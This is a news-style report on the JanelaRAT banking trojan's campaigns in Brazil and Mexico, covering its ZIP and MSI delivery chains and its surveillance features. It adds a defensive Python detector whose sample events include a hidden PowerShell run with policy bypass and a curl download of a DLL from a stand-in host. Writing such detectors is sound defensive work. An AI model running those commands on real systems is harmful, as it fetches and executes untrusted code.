Banks and financial institutions in Latin America have been hit by a new wave of attacks by the JanelaRAT malware, which is actively used to steal financial data and track victims. In 2025, more than 14,700 attacks were recorded in Brazil alone.
Financial firms across Latin America are under attack once again. Banks in Brazil, Mexico and other countries have been hit with yet another wave of infections stemming from the JanelaRAT malware, a family with a proven track record of going after money and after people’s ability to access their accounts.
JanelaRAT is not new: it is an updated version of BX RAT. Unlike its predecessor, however, JanelaRAT has become much more aggressive. It does not merely steal login credentials or passwords. Instead, it “lives” inside the system, waits until the user makes a move, and then tracks every action: mouse movements are tracked, every keystroke is captured, screenshots are taken, and while it watches it also gathers important data about the system. Naturally, JanelaRAT is particularly interested in anything related to banking and cryptocurrency.
Researchers say that JanelaRAT works in an unusual way. While most malware simply sits back and waits for the victim to take action, JanelaRAT continuously checks which website the victim is viewing.
“According to researchers, one of the key differences between JanelaRAT and other malware variants is how they detect the title bar of a browser tab in order to determine which site the user is viewing in their browser and then execute malicious actions.”
Simply stated, if the victim opens a financial website, JanelaRAT “wakes up” and becomes active. At the same time, the attacks are constantly evolving — the operators continually update both the malware and its method of distribution.
The number of attacks paints an alarming picture. According to Brazilian researchers, over 14,000 attacks occurred in Brazil alone in 2025, and over 11,700 occurred in Mexico during the same year. These are the only figures available — how many of these attacks resulted in successful breaches is unknown.
Historically, the attackers’ strategy has followed a relatively simple pattern. A user would receive a ZIP file containing a VBScript, which would download a second file along with a DLL. At the end of this sequence, the Trojan was executed via DLL side-loading so that it appeared to be running as part of a legitimate program.
More recently, things have become somewhat more complex. New campaigns use MSI installers instead of traditional ZIP files. MSI installers draw little suspicion: they look like ordinary software, are hosted on legitimate services (such as GitLab), and are often disguised as normal applications.
Once the MSI installer is launched, a series of events begins. Go, PowerShell and batch scripts extract the contents of the archive — including the Trojan itself — as well as any additional files required. In some cases, a separate browser extension is also installed (KPMG reported this behaviour).
What happens next is perhaps even more intriguing. The malware identifies the user’s browsers and quietly attaches the aforementioned extension. From that point on, everything is collected: cookies, browsing history, open tabs and plug-ins are all harvested, and the extension can also react to the sites the user visits.
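As an added defensive example (not code from the article or from any of the researchers it cites), the following rules flag process-creation events that match the two delivery chains described above: the ZIP-borne VBScript stage and the MSI installer spawning a PowerShell or batch stage. The field names (parent, image, cmdline) and the sample events are constructed for illustration and assume Sysmon-style parent/child process logging.

```python
"""Flag process-creation events matching the JanelaRAT delivery chains
described in the article. Field names and sample events are constructed."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    parent: str    # parent process image name (constructed field)
    image: str     # child process image name (constructed field)
    cmdline: str   # child command line (constructed field)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}      # VBScript stage of the ZIP chain
STAGE_CHILDREN = {"powershell.exe", "cmd.exe"}     # PowerShell / batch stage


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a reason if the event looks like one of the chains, else None."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    if parent == "msiexec.exe" and image in STAGE_CHILDREN:
        return "msi installer spawned a script stage"
    if parent in SCRIPT_HOSTS and image in STAGE_CHILDREN:
        return "vbscript spawned a script stage"
    if parent in SCRIPT_HOSTS and ("http://" in cmd or "https://" in cmd):
        return "vbscript launched a process with a URL (download stage)"
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Run classify() over a list of events and return (index, reason) hits."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]


# Constructed sample events; only indexes 1, 2 and 3 should be flagged.
SAMPLE = [
    ProcEvent("explorer.exe", "msiexec.exe", r"msiexec /i C:\Users\u\Downloads\fatura.msi"),
    ProcEvent("msiexec.exe", "powershell.exe", "powershell -w hidden -ep bypass -f stage.ps1"),
    ProcEvent("wscript.exe", "cmd.exe", "cmd /c extract.bat"),
    ProcEvent("wscript.exe", "curl.exe", "curl -o x.dll https://example.invalid/x.dll"),
    ProcEvent("explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default"),
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE):
        print(f"event {idx}: {reason}")
```

The rules only cover the parent/child relationships the article names; a real deployment would add the MSI's download source and the DLL side-loading step as further signals.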
A typical attack looks mundane. A user receives a notification stating that her account needs attention. She clicks the link provided and downloads what appears to be a PDF document — and, unbeknownst to her, launches a ZIP file that carries the complete infection.
For nearly all of 2024, the attackers have shifted their focus toward MSI-based distribution. The installers serve multiple purposes: they act as droppers — and as autorun tools on Windows.
Upon execution, JanelaRAT connects to a server and begins monitoring activity. Its primary objective is to notice each time the victim logs into a banking or financial application or website. When the victim does so, JanelaRAT checks the name of the active window; after approximately 2-3 seconds, if the name matches a target — JanelaRAT executes the corresponding actions.
In all, JanelaRAT has a very wide range of functions. These include:
Screenshots
Extracting portions of screens
Simulating “update windows” or displaying mockup banking pages/forms
Recording keystrokes
Moving the cursor and simulating mouse clicks
Executing PowerShell commands
Hiding its operations
Checking for anti-fraud detection
One final note: the malware checks whether someone is using the computer. If the computer has been idle for more than 10 minutes — it notifies its server. Once someone uses the computer again — it sends a message to its server indicating that it is okay to proceed. In this way, the operators know when the user is away from the machine and when activity has resumed.